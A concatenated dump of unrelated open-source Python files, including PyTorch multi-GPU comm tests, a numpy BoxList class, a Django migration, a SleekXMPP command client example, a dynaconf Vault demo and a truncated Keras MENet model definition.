torch.randn(5, 5) y = torch.randn(5, 5) x_cuda = x.cuda(0) y_cuda = y.cuda(1) result = comm.reduce_add((x_cuda, y_cuda)) self.assertEqual(result.get_device(), 0) self.assertEqual(result.cpu(), x + y) def _test_reduce_add_coalesced(self, tensors, buffer_size): dup_tensors = [tensors, [t.cuda(1) for t in tensors]] r_tensors = [comm.reduce_add(t) for t in zip(*dup_tensors)] for r, t in zip(r_tensors, tensors): self.assertEqualTypeString(r, t) self.assertEqual(r, t * 2) rc_tensors = comm.reduce_add_coalesced(dup_tensors, buffer_size=buffer_size) self.assertEqual(r_tensors, rc_tensors) for r, rc in zip(r_tensors, rc_tensors): self.assertEqualTypeString(rc, r) # Since we have both cuda:0 and cuda:1 inputs, the outputs must be new. # We can check that they have different version counters. # NOTE [ Version Counter in comm.*_coalesced ] versions = [t._version for t in rc_tensors] for old_version, t in zip(versions, rc_tensors): self.assertEqual(t._version, old_version) t.zero_() self.assertEqual(t._version, old_version + 1) @unittest.skipIf(not TEST_MULTIGPU, "only one GPU detected") def test_reduce_add_coalesced(self): numel = 5 num_bytes = numel * 8 tensors = [ make_sparse_tensor(torch.cuda.sparse.DoubleTensor, 1, 2, 3), torch.randn(numel).long().cuda(), torch.randn(numel).cuda(), make_sparse_tensor(torch.cuda.sparse.DoubleTensor, 10, 2, 3), make_sparse_tensor(torch.cuda.sparse.DoubleTensor, 5, 2, 3), make_sparse_tensor(torch.cuda.sparse.LongTensor, 7, 3, 3), make_sparse_tensor(torch.cuda.sparse.FloatTensor, 2, 2, 3), torch.randn(numel).long().cuda(), torch.randn(numel).long().cuda(), make_sparse_tensor(torch.cuda.sparse.LongTensor, 3, 2, 7), torch.randn(numel * 2).int().cuda(), # int is 2x shorter torch.randn(numel).cuda(), ] self._test_reduce_add_coalesced(tensors, num_bytes * 5 // 2) @unittest.skipIf(not TEST_MULTIGPU, "only one GPU detected") def test_reduce_add_coalesced_dense_only(self): numel = 5 num_bytes = numel * 8 tensors = [ torch.randn(numel).long().cuda(), torch.randn(numel).cuda(), torch.randn(numel).long().cuda(), torch.randn(numel).long().cuda(), torch.randn(numel * 2).int().cuda(), # int is 2x shorter torch.randn(numel).cuda(), ] self._test_reduce_add_coalesced(tensors, num_bytes * 5 // 2) def _test_scatter(self, input, chunk_sizes=None, dim=0): if not TEST_MULTIGPU: raise unittest.SkipTest("only one GPU detected") if chunk_sizes is None: ref_chunk_sizes = tuple(repeat(input.size(dim) // 2, 2)) else: ref_chunk_sizes = chunk_sizes # test regular result = comm.scatter(input, (0, 1), chunk_sizes, dim) self.assertEqual(len(result), 2) chunk_start = 0 for i, r in enumerate(result): chunk_end = chunk_start + ref_chunk_sizes[i] index = [slice(None, None) for _ in range(input.dim())] index[dim] = slice(chunk_start, chunk_end) self.assertEqual(r, input[tuple(index)], atol=0, rtol=0) chunk_start = chunk_end if r.device == input.device: self.assertEqual(r.data_ptr(), input.data_ptr()) # for target @ same device, a view should be returned # test out out = [torch.empty_like(t) for t in result] result = comm.scatter(input, dim=dim, out=out) self.assertEqual(len(result), 2) chunk_start = 0 for i, r in enumerate(result): self.assertIs(r, out[i]) chunk_end = chunk_start + ref_chunk_sizes[i] index = [slice(None, None) for _ in range(input.dim())] index[dim] = slice(chunk_start, chunk_end) self.assertEqual(r, input[tuple(index)], atol=0, rtol=0) chunk_start = chunk_end # test error msg if chunk_sizes is not None: with self.assertRaisesRegex(RuntimeError, r"Expected devices and chunk_sizes to be of same length"): comm.scatter(input, [0 for _ in range(len(chunk_sizes) + 1)], dim=dim, chunk_sizes=chunk_sizes) with self.assertRaisesRegex(RuntimeError, r"'devices' must not be specified"): comm.scatter(input, (0, 1), dim=dim, out=out) with self.assertRaisesRegex(RuntimeError, r"Expected at least one device to scatter to"): comm.scatter(input, (), dim=dim) with self.assertRaisesRegex(RuntimeError, r"Expected at least one output tensor to scatter to"): comm.scatter(input, dim=dim, out=[]) with self.assertRaisesRegex(RuntimeError, r"Expected all output tensors to be CUDA tensors, but output tensor at index 0"): comm.scatter(input, dim=dim, out=([out[0].cpu()] + out[1:])) with self.assertRaisesRegex(RuntimeError, r"Output tensor at index 0 has incorrect shape"): comm.scatter(input, dim=dim, out=([out[0].unsqueeze(0)] + out[1:])) with self.assertRaisesRegex(RuntimeError, r"Total size for output tensors along scatter dim \d+ does not match"): index = [slice(None, None) for _ in range(input.dim())] index[dim] = slice(1, None) comm.scatter(input, dim=dim, out=([out[0][tuple(index)]] + out[1:])) def test_scatter_cpu(self): self._test_scatter(torch.randn(4, 4), dim=0) def test_scatter_cpu_dim(self): self._test_scatter(torch.randn(4, 4), dim=1) def test_scatter_cpu_neg_dim(self): self._test_scatter(torch.randn(4, 4), dim=-2) def test_scatter_cpu_sizes(self): self._test_scatter(torch.randn(6, 4), chunk_sizes=(2, 4)) def test_scatter_gpu(self): self._test_scatter(torch.randn(4, 4).cuda(), dim=0) def test_scatter_gpu_dim(self): self._test_scatter(torch.randn(4, 4).cuda(), dim=1) def test_scatter_gpu_neg_dim(self): self._test_scatter(torch.randn(4, 4).cuda(), dim=-2) def test_scatter_gpu_sizes(self): self._test_scatter(torch.randn(6, 4).cuda(), chunk_sizes=(2, 4)) def _test_gather(self, dim): if not TEST_MULTIGPU: raise unittest.SkipTest("only one GPU detected") x = torch.randn(2, 5, device=0) y = torch.randn(2, 5, device=1) expected_size = list(x.size()) expected_size[dim] += y.size(dim) expected_size = torch.Size(expected_size) destinations = [None, torch.device('cuda:0'), torch.device('cpu')] if torch.cuda.device_count() > 2: destinations.append(torch.device('cuda:2')) with torch.cuda.device(1): for destination in destinations: if destination is None: expected_device = torch.device('cuda', torch.cuda.current_device()) else: expected_device = destination for use_out in [True, False]: if use_out: out = torch.empty(expected_size, device=expected_device) result = comm.gather((x, y), dim, out=out) self.assertIs(out, result) else: result = comm.gather((x, y), dim, destination=destination) self.assertEqual(result.device, expected_device) self.assertEqual(result.size(), expected_size) index = [slice(None, None), slice(None, None)] index[dim] = slice(0, x.size(dim)) self.assertEqual(result[tuple(index)], x) index[dim] = slice(x.size(dim), x.size(dim) + y.size(dim)) self.assertEqual(result[tuple(index)], y) # test error msg with self.assertRaisesRegex(RuntimeError, r"'destination' must not be specified"): comm.gather((x, y), dim, destination='cpu', out=torch.empty(expected_size, device='cpu')) with self.assertRaisesRegex(RuntimeError, r"Expected at least one tensor to gather from"): comm.gather(()) with self.assertRaisesRegex(RuntimeError, r"Expected all input tensors to be CUDA tensors, "): comm.gather((x.cpu(), y)) with self.assertRaisesRegex(RuntimeError, r"Expected all input tensors to have the same number of dimensions"): comm.gather((x, y.unsqueeze(0))) with self.assertRaisesRegex(RuntimeError, r"Input tensor at index 1 has invalid shape"): if dim in [0, -2]: comm.gather((x, y[:, 1:]), dim=dim) elif dim in [1, -1]: comm.gather((x, y[1:, :]), dim=dim) def test_gather(self): self._test_gather(0) def test_gather_dim(self): self._test_gather(1) def test_gather_neg_dim(self): self._test_gather(-1) @unittest.skipIf(not TEST_MULTIGPU, "only one GPU detected") def test_memory_format_scatter_gather(self): nhwc = torch.randn((10, 3, 32, 32), device='cpu').contiguous(memory_format=torch.channels_last) results = torch.cuda.comm.scatter(nhwc, (0, 1), None, 0) for result in results: self.assertFalse(result.is_contiguous()) self.assertTrue(result.is_contiguous(memory_format=torch.channels_last)) gathered = torch.cuda.comm.gather(results) self.assertTrue(gathered.is_contiguous(memory_format=torch.channels_last)) def test_matmul_device_mismatch(self): cpu = torch.rand((10, 10)) cuda = cpu.cuda() with self.assertRaisesRegex(RuntimeError, "Expected all tensors to be on the same device"): cpu @ cuda with self.assertRaisesRegex(RuntimeError, "Expected all tensors to be on the same device"): cuda @ cpu for s, m1, m2 in product((cpu, cuda), repeat=3): if s.device == m1.device == m2.device: torch.addmm(s, m1, m2) else: with self.assertRaisesRegex(RuntimeError, "Expected all tensors to be on the same device"): torch.addmm(s, m1, m2) @unittest.skipIf(not TEST_MULTIGPU, "Test needs multiple GPUs") def test_scatter_namedtuple(self): # tests ability to scatter namedtuples and retrieve a list where each # element is of the expected namedtuple type. fields = ("a", "b") TestNamedTupleInput_0 = collections.namedtuple("NamedTuple", fields) num_gpus = torch.cuda.device_count() a = torch.rand(num_gpus * 2, device=0) b = torch.rand(num_gpus * 2, device=0) a_tensors_for_gpu = [a[2 * i : 2 * i + 2].to(i) for i in range(num_gpus)] b_tensors_for_gpu = [b[2 * i : 2 * i + 2].to(i) for i in range(num_gpus)] inp = TestNamedTupleInput_0(a, b) target_gpus = [torch.device(i) for i in range(num_gpus)] scatter_out = scatter_gather.scatter(inp, target_gpus) for i, x in enumerate(scatter_out): self.assertTrue(isinstance(x, type(inp))) self.assertEqual(x._fields, fields) expected_a = a_tensors_for_gpu[i] expected_b = b_tensors_for_gpu[i] self.assertEqual(expected_a, x.a) self.assertEqual(expected_b, x.b) class TestNamedTupleInput_1(NamedTuple): a: torch.tensor b: torch.tensor a = torch.rand(num_gpus * 2, device=0) b = torch.rand(num_gpus * 2, device=0) a_tensors_for_gpu = [a[2 * i : 2 * i + 2].to(i) for i in range(num_gpus)] b_tensors_for_gpu = [b[2 * i : 2 * i + 2].to(i) for i in range(num_gpus)] inp = TestNamedTupleInput_1(a, b) scatter_out = scatter_gather.scatter(inp, target_gpus) for i, x in enumerate(scatter_out): self.assertTrue(isinstance(x, type(inp))) self.assertEqual(x._fields, fields) expected_a = a_tensors_for_gpu[i] expected_b = b_tensors_for_gpu[i] self.assertEqual(expected_a, x.a) self.assertEqual(expected_b, x.b) @unittest.skipIf(not TEST_MULTIGPU, "Test needs multiple GPUs") def test_gather_namedtuple(self): # tests ability to gather a list of namedtuples and return a namedtuple where each # element is of the expected tensor type. fields = ['a', 'b'] TestNamedTupleInput_0 = collections.namedtuple('NamedTuple', fields) num_gpus = torch.cuda.device_count() a = torch.rand(num_gpus * 2, device=0) b = torch.rand(num_gpus * 2, device=1) out1 = TestNamedTupleInput_0(a, b) a = torch.rand(num_gpus * 2, device=1) b = torch.rand(num_gpus * 2, device=0) out2 = TestNamedTupleInput_0(a, b) outputs = [out1, out2] out = scatter_gather.gather(outputs, 'cpu') # test on CPU for i, x in enumerate(out): self.assertTrue(isinstance(x, type(out2[-1]))) # x must be a tensor cat = torch.cat((outputs[0][i].to('cpu'), outputs[1][i].to('cpu'))) self.assertTrue(torch.equal(x, cat)) out = scatter_gather.gather(outputs, 0) # test on GPU for i, x in enumerate(out): self.assertTrue(isinstance(x, type(out2[-1]))) cat = torch.cat((outputs[0][i].to(0), outputs[1][i].to(0))) self.assertTrue(torch.equal(x, cat)) class TestNamedTupleInput_1(NamedTuple): a: torch.tensor b: torch.tensor a = torch.rand(num_gpus * 2, device=0) b = torch.rand(num_gpus * 2, device=1) out1 = TestNamedTupleInput_1(a, b) a = torch.rand(num_gpus * 2, device=1) b = torch.rand(num_gpus * 2, device=0) out2 = TestNamedTupleInput_1(a, b) outputs = [out1, out2] out = scatter_gather.gather(outputs, 0) # test on GPU for i, x in enumerate(out): self.assertTrue(isinstance(x, type(out2[-1]))) cat = torch.cat((outputs[0][i].to(0), outputs[1][i].to(0))) self.assertTrue(torch.equal(x, cat)) out = scatter_gather.gather(outputs, 'cpu') # test on CPU for i, x in enumerate(out): self.assertTrue(isinstance(x, type(out2[-1]))) cat = torch.cat((outputs[0][i].to('cpu'), outputs[1][i].to('cpu'))) self.assertTrue(torch.equal(x, cat)) if __name__ == '__main__': run_tests()
py
7df9f68f572e28eb75ede5c9bcacff4c28c06da5
# Copyright 2017 The TensorFlow Authors. All Rights Reserved. # # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. # You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. # See the License for the specific language governing permissions and # limitations under the License. # ============================================================================== """Numpy BoxList classes and functions.""" import numpy as np class BoxList(object): """Box collection. BoxList represents a list of bounding boxes as numpy array, where each bounding box is represented as a row of 4 numbers, [y_min, x_min, y_max, x_max]. It is assumed that all bounding boxes within a given list correspond to a single image. Optionally, users can add additional related fields (such as objectness/classification scores). """ def __init__(self, data): """Constructs box collection. Args: data: a numpy array of shape [N, 4] representing box coordinates Raises: ValueError: if bbox data is not a numpy array ValueError: if invalid dimensions for bbox data """ if not isinstance(data, np.ndarray): raise ValueError('data must be a numpy array.') if len(data.shape) != 2 or data.shape[1] != 4: raise ValueError('Invalid dimensions for box data.') if data.dtype != np.float32 and data.dtype != np.float64: raise ValueError('Invalid data type for box data: float is required.') if not self._is_valid_boxes(data): raise ValueError('Invalid box data. data must be a numpy array of ' 'N*[y_min, x_min, y_max, x_max]') self.data = {'boxes': data} def num_boxes(self): """Return number of boxes held in collections.""" return self.data['boxes'].shape[0] def get_extra_fields(self): """Return all non-box fields.""" return [k for k in self.data.keys() if k != 'boxes'] def has_field(self, field): return field in self.data def add_field(self, field, field_data): """Add data to a specified field. Args: field: a string parameter used to speficy a related field to be accessed. field_data: a numpy array of [N, ...] representing the data associated with the field. Raises: ValueError: if the field is already exist or the dimension of the field data does not matches the number of boxes. """ if self.has_field(field): raise ValueError('Field ' + field + 'already exists') if len(field_data.shape) < 1 or field_data.shape[0] != self.num_boxes(): raise ValueError('Invalid dimensions for field data') self.data[field] = field_data def get(self): """Convenience function for accesssing box coordinates. Returns: a numpy array of shape [N, 4] representing box corners """ return self.get_field('boxes') def get_field(self, field): """Accesses data associated with the specified field in the box collection. Args: field: a string parameter used to speficy a related field to be accessed. Returns: a numpy 1-d array representing data of an associated field Raises: ValueError: if invalid field """ if not self.has_field(field): raise ValueError('field {} does not exist'.format(field)) return self.data[field] def get_coordinates(self): """Get corner coordinates of boxes. Returns: a list of 4 1-d numpy arrays [y_min, x_min, y_max, x_max] """ box_coordinates = self.get() y_min = box_coordinates[:, 0] x_min = box_coordinates[:, 1] y_max = box_coordinates[:, 2] x_max = box_coordinates[:, 3] return [y_min, x_min, y_max, x_max] def _is_valid_boxes(self, data): """Check whether data fullfills the format of N*[ymin, xmin, ymax, xmin]. Args: data: a numpy array of shape [N, 4] representing box coordinates Returns: a boolean indicating whether all ymax of boxes are equal or greater than ymin, and all xmax of boxes are equal or greater than xmin. """ if data.shape[0] > 0: for i in xrange(data.shape[0]): if data[i, 0] > data[i, 2] or data[i, 1] > data[i, 3]: return False return True
py
7df9f6f38802672cb78b65cb0e08d4a63bb2be56
import os import torch import pickle import argparse import torchvision.utils as vutils # Path import os, sys currentdir = os.path.dirname(os.path.realpath(__file__)) parentdir = os.path.dirname(currentdir) basedir = os.path.dirname(parentdir) sys.path.append(parentdir) sys.path.append(basedir) # Target from target import get_target, get_target_id, add_target_args # Model from model import get_model, get_model_id, add_model_args from survae.distributions import StandardNormal ########### ## Setup ## ########### parser = argparse.ArgumentParser() parser.add_argument('--exp', type=str, required=True) parser.add_argument('--mcmc', type=str, required=True) parser.add_argument('--num_samples', type=int, default=64) parser.add_argument('--nrow', type=int, default=8) eval_args = parser.parse_args() torch.manual_seed(0) exp_path = os.path.join('log', eval_args.exp) mcmc_path = os.path.join('log', eval_args.exp, eval_args.mcmc) path_args = os.path.join(exp_path, 'args.pkl') path_chain = os.path.join(mcmc_path, 'chain.pt') ############### ## Load args ## ############### with open(path_args, 'rb') as f: args = pickle.load(f) #################### ## Specify target ## #################### target = get_target(args) target_id = get_target_id(args) ############## ## Sampling ## ############## print('Sampling...') with torch.no_grad(): theta = torch.load(path_chain) # (C,T,D) theta = theta[:,-1] # (C,D) perm = torch.randperm(theta.shape[0]) idx = perm[:eval_args.num_samples] theta = theta[idx] imgs = target.vec2img(theta).cpu().float().unsqueeze(1) ############ ## Sample ## ############ path_samples = os.path.join(mcmc_path, 'samples.png') vutils.save_image(imgs, fp=path_samples, nrow=eval_args.nrow) data_true = (target.img.unsqueeze(0).unsqueeze(0)+1)/2 data_corr = (target.img_corrupted.unsqueeze(0).unsqueeze(0)+1)/2 vutils.save_image(data_true, fp=os.path.join(mcmc_path, 'data_true.png'), nrow=1) vutils.save_image(data_corr, fp=os.path.join(mcmc_path, 'data_corr.png'), nrow=1)
py
7df9f75f684bc0e8ca4ef3434380449a25e21765
# Generated by Django 2.0.2 on 2018-02-13 12:21 from django.db import migrations, models class Migration(migrations.Migration): dependencies = [ ('epsilon', '0002_auto_20180213_0930'), ] operations = [ migrations.AlterField( model_name='tag', name='status', field=models.BooleanField(default=True, verbose_name='状态'), ), ]
py
7df9f793e4915975b86c59d638fb70365a75db60
#!/usr/bin/env python # -*- coding: utf-8 -*- """ SleekXMPP: The Sleek XMPP Library Copyright (C) 2010 Nathanael C. Fritz This file is part of SleekXMPP. See the file LICENSE for copying permission. """ import sys import logging import getpass from optparse import OptionParser import sleekxmpp # Python versions before 3.0 do not use UTF-8 encoding # by default. To ensure that Unicode is handled properly # throughout SleekXMPP, we will set the default encoding # ourselves to UTF-8. if sys.version_info < (3, 0): from sleekxmpp.util.misc_ops import setdefaultencoding setdefaultencoding('utf8') else: raw_input = input class CommandUserBot(sleekxmpp.ClientXMPP): """ A simple SleekXMPP bot that uses the adhoc command provided by the adhoc_provider.py example. """ def __init__(self, jid, password, other, greeting): sleekxmpp.ClientXMPP.__init__(self, jid, password) self.command_provider = other self.greeting = greeting # The session_start event will be triggered when # the bot establishes its connection with the server # and the XML streams are ready for use. We want to # listen for this event so that we we can initialize # our roster. self.add_event_handler("session_start", self.start) self.add_event_handler("message", self.message) def start(self, event): """ Process the session_start event. Typical actions for the session_start event are requesting the roster and broadcasting an initial presence stanza. Arguments: event -- An empty dictionary. The session_start event does not provide any additional data. """ self.send_presence() self.get_roster() # We first create a session dictionary containing: # 'next' -- the handler to execute on a successful response # 'error' -- the handler to execute if an error occurs # The session may also contain custom data. session = {'greeting': self.greeting, 'next': self._command_start, 'error': self._command_error} self['xep_0050'].start_command(jid=self.command_provider, node='greeting', session=session) def message(self, msg): """ Process incoming message stanzas. Arguments: msg -- The received message stanza. """ logging.info(msg['body']) def _command_start(self, iq, session): """ Process the initial command result. Arguments: iq -- The iq stanza containing the command result. session -- A dictionary of data relevant to the command session. Additional, custom data may be saved here to persist across handler callbacks. """ # The greeting command provides a form with a single field: # <x xmlns="jabber:x:data" type="form"> # <field var="greeting" # type="text-single" # label="Your greeting" /> # </x> form = self['xep_0004'].makeForm(ftype='submit') form.addField(var='greeting', value=session['greeting']) session['payload'] = form # We don't need to process the next result. session['next'] = None # Other options include using: # continue_command() -- Continue to the next step in the workflow # cancel_command() -- Stop command execution. self['xep_0050'].complete_command(session) def _command_error(self, iq, session): """ Process an error that occurs during command execution. Arguments: iq -- The iq stanza containing the error. session -- A dictionary of data relevant to the command session. Additional, custom data may be saved here to persist across handler callbacks. """ logging.error("COMMAND: %s %s" % (iq['error']['condition'], iq['error']['text'])) # Terminate the command's execution and clear its session. # The session will automatically be cleared if no error # handler is provided. self['xep_0050'].terminate_command(session) self.disconnect() if __name__ == '__main__': # Setup the command line arguments. optp = OptionParser() # Output verbosity options. optp.add_option('-q', '--quiet', help='set logging to ERROR', action='store_const', dest='loglevel', const=logging.ERROR, default=logging.INFO) optp.add_option('-d', '--debug', help='set logging to DEBUG', action='store_const', dest='loglevel', const=logging.DEBUG, default=logging.INFO) optp.add_option('-v', '--verbose', help='set logging to COMM', action='store_const', dest='loglevel', const=5, default=logging.INFO) # JID and password options. optp.add_option("-j", "--jid", dest="jid", help="JID to use") optp.add_option("-p", "--password", dest="password", help="password to use") optp.add_option("-o", "--other", dest="other", help="JID providing commands") optp.add_option("-g", "--greeting", dest="greeting", help="Greeting") opts, args = optp.parse_args() # Setup logging. logging.basicConfig(level=opts.loglevel, format='%(levelname)-8s %(message)s') if opts.jid is None: opts.jid = raw_input("Username: ") if opts.password is None: opts.password = getpass.getpass("Password: ") if opts.other is None: opts.other = raw_input("JID Providing Commands: ") if opts.greeting is None: opts.greeting = raw_input("Greeting: ") # Setup the CommandBot and register plugins. Note that while plugins may # have interdependencies, the order in which you register them does # not matter. xmpp = CommandUserBot(opts.jid, opts.password, opts.other, opts.greeting) xmpp.register_plugin('xep_0030') # Service Discovery xmpp.register_plugin('xep_0004') # Data Forms xmpp.register_plugin('xep_0050') # Adhoc Commands # If you are working with an OpenFire server, you may need # to adjust the SSL version used: # xmpp.ssl_version = ssl.PROTOCOL_SSLv3 # If you want to verify the SSL certificates offered by a server: # xmpp.ca_certs = "path/to/ca/cert" # Connect to the XMPP server and start processing XMPP stanzas. if xmpp.connect(): # If you do not have the dnspython library installed, you will need # to manually specify the name of the server if it does not match # the one in the JID. For example, to use Google Talk you would # need to use: # # if xmpp.connect(('talk.google.com', 5222)): # ... xmpp.process(block=True) print("Done") else: print("Unable to connect.")
py
7df9f7aa355b20c6089c565ef15749937c7616a1
from ._version import __version__
py
7df9f7c05d850983dcf0d0ffefc01b48dfda018a
class Solution(object): def isBipartite(self, graph) -> bool: # Corner case if len(graph) == 0: return True color = {} for i in range(len(graph)): if i not in color: color[i] = 1 queue = list() queue.append(i) while len(queue) > 0: curr = queue.pop(0) for g in graph[curr]: if g not in color: color[g] = -color[curr] queue.append(g) else: if color[g] == color[curr]: return False return True
py
7df9f7fe8abf5111a949dd9aaa0fb894ed4aea9a
from dynaconf import settings from dynaconf.loaders.vault_loader import list_envs print(settings.FOO) # noqa # >>> 'foo_is_default' with settings.using_env("dev"): assert settings.SECRET == "vault_works_in_dev", settings.SECRET assert settings.FOO == "foo_is_default", settings.FOO assert settings.SECRET == "vault_works_in_default" available_envs = list_envs(settings, "dynaconf/") assert set(available_envs) == set(["default", "dev", "prod"]), available_envs all_secrets = [] for env in available_envs: env_settings = settings.from_env(env) assert env_settings.from_env(env).SECRET == "vault_works_in_{0}".format( env ) assert env_settings.FOO == "foo_is_default" all_secrets.append(env_settings.SECRET) print(available_envs) print(all_secrets)
py
7df9f8af15b9b7d7ed2d4374c0bce228689af733
""" MENet, implemented in Keras. Original paper: 'Merging and Evolution: Improving Convolutional Neural Networks for Mobile Applications,' https://arxiv.org/abs/1803.09127. """ __all__ = ['menet', 'menet108_8x1_g3', 'menet128_8x1_g4', 'menet160_8x1_g8', 'menet228_12x1_g3', 'menet256_12x1_g4', 'menet348_12x1_g3', 'menet352_12x1_g8', 'menet456_24x1_g3'] import os from keras import layers as nn from keras.models import Model from .common import conv2d, conv1x1, conv3x3, depthwise_conv3x3, channel_shuffle_lambda, batchnorm, maxpool2d,\ avgpool2d, is_channels_first, get_channel_axis, flatten def me_unit(x, in_channels, out_channels, side_channels, groups, downsample, ignore_group, name="me_unit"): """ MENet unit. Parameters: ---------- x : keras.backend tensor/variable/symbol Input tensor/variable/symbol. in_channels : int Number of input channels. out_channels : int Number of output channels. side_channels : int Number of side channels. groups : int Number of groups in convolution layers. downsample : bool Whether do downsample. ignore_group : bool Whether ignore group value in the first convolution layer. name : str, default 'me_unit' Unit name. Returns ------- keras.backend tensor/variable/symbol Resulted tensor/variable/symbol. """ mid_channels = out_channels // 4 if downsample: out_channels -= in_channels identity = x # pointwise group convolution 1 x = conv1x1( x=x, in_channels=in_channels, out_channels=mid_channels, groups=(1 if ignore_group else groups), name=name + "/compress_conv1") x = batchnorm( x=x, name=name + "/compress_bn1") x = nn.Activation("relu", name=name + "/compress_activ")(x) x = channel_shuffle_lambda( channels=mid_channels, groups=groups, name=name + "/c_shuffle")(x) # merging y = conv1x1( x=x, in_channels=mid_channels, out_channels=side_channels, name=name + "/s_merge_conv") y = batchnorm( x=y, name=name + "/s_merge_bn") y = nn.Activation("relu", name=name + "/s_merge_activ")(y) # depthwise convolution (bottleneck) x = depthwise_conv3x3( x=x, channels=mid_channels, strides=(2 if downsample else 1), name=name + "/dw_conv2") x = batchnorm( x=x, name=name + "/dw_bn2") # evolution y = conv3x3( x=y, in_channels=side_channels, out_channels=side_channels, strides=(2 if downsample else 1), name=name + "/s_conv") y = batchnorm( x=y, name=name + "/s_conv_bn") y = nn.Activation("relu", name=name + "/s_conv_activ")(y) y = conv1x1( x=y, in_channels=side_channels, out_channels=mid_channels, name=name + "/s_evolve_conv") y = batchnorm( x=y, name=name + "/s_evolve_bn") y = nn.Activation('sigmoid', name=name + "/s_evolve_activ")(y) x = nn.multiply([x, y], name=name + "/mul") # pointwise group convolution 2 x = conv1x1( x=x, in_channels=mid_channels, out_channels=out_channels, groups=groups, name=name + "/expand_conv3") x = batchnorm( x=x, name=name + "/expand_bn3") if downsample: identity = avgpool2d( x=identity, pool_size=3, strides=2, padding=1, name=name + "/avgpool") x = nn.concatenate([x, identity], axis=get_channel_axis(), name=name + "/concat") else: x = nn.add([x, identity], name=name + "/add") x = nn.Activation("relu", name=name + "/final_activ")(x) return x def me_init_block(x, in_channels, out_channels, name="me_init_block"): """ MENet specific initial block. Parameters: ---------- x : keras.backend tensor/variable/symbol Input tensor/variable/symbol. in_channels : int Number of input channels. out_channels : int Number of output channels. name : str, default 'me_init_block' Block name. Returns ------- keras.backend tensor/variable/symbol Resulted tensor/variable/symbol. """ x = conv2d( x=x, in_channels=in_channels, out_channels=out_channels, kernel_size=3, strides=2, padding=1, use_bias=False, name=name + "/conv") x = batchnorm( x=x, name=name + "/bn") x = nn.Activation("relu", name=name + "/activ")(x) x = maxpool2d( x=x, pool_size=3, strides=2, padding=1, name=name + "/pool") return x def menet(channels, init_block_channels, side_channels, groups, in_channels=3, in_size=(224, 224), classes=1000): """ ShuffleNet model from 'ShuffleNet: An Extremely Efficient Convolutional Neural Network for Mobile Devices,' https://arxiv.org/abs/1707.01083. Parameters: ---------- channels : list of list of int Number of output channels for each unit. init_block_channels : int Number of output channels for the initial unit. side_channels : int Number of side channels in a ME-unit. groups : int Number of groups in convolution layers. in_channels : int, default 3 Number of input channels. in_size : tuple of two ints, default (224, 224) Spatial size of the expected input image. classes : int, default 1000 Number of classification classes. """ input_shape = (in_channels, 224, 224) if is_channels_first() else (224, 224, in_channels) input = nn.Input(shape=input_shape) x = me_init_block( x=input, in_channels=in_channels, out_channels=init_block_channels, name="features/init_block") in_channels = init_block_channels for i, channels_per_stage in enumerate(channels): for j, out_channels in enumerate(channels_per_stage): downsample = (j == 0) ignore_group = (i == 0) and (j == 0) x = me_unit( x=x, in_channels=in_channels, out_channels=out_channels, side_channels=side_channels, groups=groups, downsample=downsample, ignore_group=ignore_group, name="features/stage{}/unit{}".format(i + 1, j + 1)) in_channels = out_channels x = nn.AvgPool2D( pool_size=7, strides=1, name="features/final_pool")(x) x = flatten(x) x = nn.Dense( units=classes, input_dim=in_channels, name="output")(x) model = Model(inputs=input, outputs=x) model.in_size = in_size model.classes = classes return model def get_menet(first_stage_channels, side_channels, groups, model_name=None, pretrained=False, root=os.path.join('~', '.keras', 'models'), **kwargs): """ Create MENet model with specific parameters. Parameters: ---------- first_stage_channels : int Number of output channels at the first stage. side_channels : int Number of side channels in a ME-unit. groups : int Number of groups in convolution layers. model_name : str or None, default None Model name for loading pretrained model. pretrained : bool, default False Whether to load the pretrained weights for model. root : str, default '~/.keras/models' Location for keeping the model parameters. """ layers = [4, 8, 4] if first_stage_channels == 108: init_block_channels = 12 channels_per_layers = [108, 216, 432] elif first_stage_channels == 128: init_block_channels = 12 channels_per_layers = [128, 256, 512] elif first_stage_channels == 160: init_block_channels = 16 channels_per_layers = [160, 320, 640] elif first_stage_channels == 228: init_block_channels = 24 channels_per_layers = [228, 456, 912] elif first_stage_channels == 256: init_block_channels = 24 channels_per_layers = [256, 512, 1024] elif first_stage_channels == 348: init_block_channels = 24 channels_per_layers = [348, 696, 1392] elif first_stage_channels == 352: init_block_channels = 24 channels_per_layers = [352, 704, 1408] elif first_stage_channels == 456: init_block_channels = 48 channels_per_layers = [456, 912, 1824] else: raise ValueError("The {} of `first_stage_channels` is not supported".format(first_stage_channels)) channels = [[ci] * li for (ci, li) in zip(channels_per_layers, layers)] net = menet( channels=channels, init_block_channels=init_block_channels, side_channels=side_channels, groups=groups, **kwargs) if pretrained: if (model_name is None) or (not model_name): raise ValueError("Parameter `model_name` should be properly initialized for loading pretrained model.") from .model_store import download_model download_model( net=net, model_name=model_name, local_model_store_dir_path=root) return net def menet108_8x1_g3(**kwargs): """ 108-MENet-8x1 (g=3) model from 'Merging and Evolution: Improving Convolutional Neural Networks for Mobile Applications,' https://arxiv.org/abs/1803.09127. Parameters: ---------- pretrained : bool, default False Whether to load the pretrained weights for model. root : str, default '~/.keras/models' Location for keeping the model parameters. """ return get_menet(first_stage_channels=108, side_channels=8, groups=3, model_name="menet108_8x1_g3", **kwargs) def menet128_8x1_g4(**kwargs): """ 128-MENet-8x1 (g=4) model from 'Merging and Evolution: Improving Convolutional Neural Networks for Mobile Applications,' https://arxiv.org/abs/1803.09127. Parameters: ---------- pretrained : bool, default False Whether to load the pretrained weights for model. root : str, default '~/.keras/models' Location for keeping the model parameters. """ return get_menet(first_stage_channels=128, side_channels=8, groups=4, model_name="menet128_8x1_g4", **kwargs) def menet160_8x1_g8(**kwargs): """ 160-MENet-8x1 (g=8) model from 'Merging and Evolution: Improving Convolutional Neural Networks for Mobile Applications,' https://arxiv.org/abs/1803.09127. Parameters: ---------- pretrained : bool, default False Whether to load the pretrained weights for model. root : str, default '~/.keras/models' Location for keeping the model parameters. """ return get_menet(first_stage_channels=160, side_channels=8, groups=8, model_name="menet160_8x1_g8", **kwargs) def menet228_12x1_g3(**kwargs): """ 228-MENet-12x1 (g=3) model from 'Merging and Evolution: Improving Convolutional Neural Networks for Mobile Applications,' https://arxiv.org/abs/1803.09127. Parameters: ---------- pretrained : bool, default False Whether to load the pretrained weights for model. root : str, default '~/.keras/models' Location for keeping the model parameters. """ return 